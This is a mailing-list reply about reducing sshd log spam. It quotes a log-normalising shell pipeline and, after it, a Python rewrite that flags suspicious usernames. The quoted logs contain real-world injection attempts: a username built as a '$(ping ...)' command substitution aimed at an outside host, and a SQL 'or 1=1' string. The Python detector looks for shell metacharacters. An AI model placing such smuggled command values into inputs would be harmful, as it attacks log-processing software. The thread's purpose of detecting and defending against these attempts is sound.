Minimize sshd log clutter/spam from unauthenticated connections
Keine Eile
keine-eile at e-mail.de
Mon Mar 20 02:46:14 AEDT 2023
[...]
> journalctl -t sshd -o cat \
> | grep -v '^Accepted ' \
> | sed -E 's/[Uu]ser \S+/user .../' \
> | sed -E 's/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/0.0.0.0/' \
> | sed -E 's/port\s+[0-9]+/port 0/' \
> | sed -E 's/".*"/"..."/' \
> | sed -E 's/Change of username or service not allowed: .+/Change of username or service not allowed: .../' \
> | sed -E 's/Their offer: .+/Their offer: .../' \
> | sort -u
>
> I found a select few attempts to mess with, identify, or exploit log parsing IDS/IPS software like fail2ban (and feel confirmed in my choice of an alternative solution with far less attack surface, see my other mail):
>
> Invalid user $(ping -c 1 16e939dc.ad.xspzo.com) from ...
> Invalid user ' $(ping -c 1 16e939dc.ad.xspzo.com) from ...
> Invalid user ' or '1'='1' - from 176.100.42.41
[...]
May I suggest you take a look at logcheck(8). It seems that this is what you are looking for.
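As an added illustration, not part of this thread or of logcheck, here is the quoted sed pipeline rewritten as Python regexes, plus a check that flags "Invalid user" lines whose username carries shell or SQL metacharacters like the ones quoted above; the sample log lines, the addresses and the host name example.invalid are constructed:

```python
import re

# Constructed sample of sshd journal lines (journalctl -t sshd -o cat style),
# not real log data; addresses and the host name are placeholders.
SAMPLE_LOG = """\
Accepted publickey for alice from 198.51.100.7 port 50122 ssh2: ED25519 SHA256:c0nstructed
Invalid user admin from 203.0.113.9 port 41522
Invalid user admin from 203.0.113.10 port 41523
Invalid user $(ping -c 1 example.invalid) from 203.0.113.11 port 41524
Invalid user ' or '1'='1' - from 203.0.113.12 port 41525
Connection closed by invalid user test 203.0.113.13 port 41526 [preauth]
"""

# The quoted sed pipeline as Python regexes; like sed without the g flag,
# each substitution replaces only the first match on a line.
SUBS = [
    (re.compile(r"[Uu]ser \S+"), "user ..."),
    (re.compile(r"\d+\.\d+\.\d+\.\d+"), "0.0.0.0"),
    (re.compile(r"port\s+\d+"), "port 0"),
    (re.compile(r'".*"'), '"..."'),
    (re.compile(r"Change of username or service not allowed: .+"),
     "Change of username or service not allowed: ..."),
    (re.compile(r"Their offer: .+"), "Their offer: ..."),
]

# Username field of an "Invalid user" line, and the metacharacters a log
# parser that shells out or builds SQL from that field must never interpret.
USERNAME = re.compile(r"Invalid user (.*?) from ")
METACHARS = re.compile(r"[$`'\";|&<>]")

def normalize(line):
    """Apply the pipeline's substitutions to one raw log line."""
    for pat, repl in SUBS:
        line = pat.sub(repl, line, count=1)
    return line

def unique_patterns(text):
    """grep -v '^Accepted ' | sed ... | sort -u, returned as a sorted list."""
    lines = (l for l in text.splitlines() if not l.startswith("Accepted "))
    return sorted({normalize(l) for l in lines})

def injection_attempts(text):
    """(username, raw line) for lines that smuggle syntax via the username.
    Runs on the raw line: the normaliser cuts the username at the first
    space, so the evidence is partly gone after it."""
    hits = []
    for l in text.splitlines():
        m = USERNAME.search(l)
        if m and METACHARS.search(m.group(1)):
            hits.append((m.group(1), l))
    return hits
```

The two lines flagged by injection_attempts are the kind that deserve a separate alert rather than being folded into the deduplicated summary.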